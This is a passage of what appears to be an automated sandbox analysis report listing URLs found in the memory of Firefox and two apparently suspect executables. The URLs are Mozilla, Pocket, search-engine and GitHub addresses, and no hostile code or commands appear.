Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3242550855.000001C23E2FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3246123613.000001C23CE15000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3258019114.0000001AEF4BB000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678942
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1817617
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=793869
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=806991
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3243620551.000001C23E2D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3242550855.000001C23E2E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=815437
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3242550855.000001C23E2FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=951422
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: 79ddad050f.exe, 00000008.00000003.3071958738.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3241098493.0000000001039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 79ddad050f.exe, 00000008.00000003.3034902192.00000000058E6000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3241098493.0000000001039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3190903073.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D804000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsInt
Source: firefox.exe, 0000001B.00000002.3641525579.000001C23DED9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3641525579.000001C23DEF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DDA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150637847.000001C23BE3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3282408965.0000016489E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150450150.000001C23BE1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150800700.000001C23BE60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150956567.000001C23BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150183043.000001C23C300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F123000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5312000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3181465524.000001C244A29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3193714201.000001C244A82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1BrowserInitState.startupIdleTaskPromise
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C2384D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001B.00000002.3624313828.000001C23CBC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F123000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5312000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3438395331.000001C23B663000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238548000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A532F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabListens
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreextensions.pocket.oAuthConsumerKey
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morehome-prefs-highlights-option-saved-to-pocket
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsStructured
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150637847.000001C23BE3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150450150.000001C23BE1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150800700.000001C23BE60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150183043.000001C23C300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/#getLanguageIdModelArrayBuffer
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3286911695.000001C22C311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881See
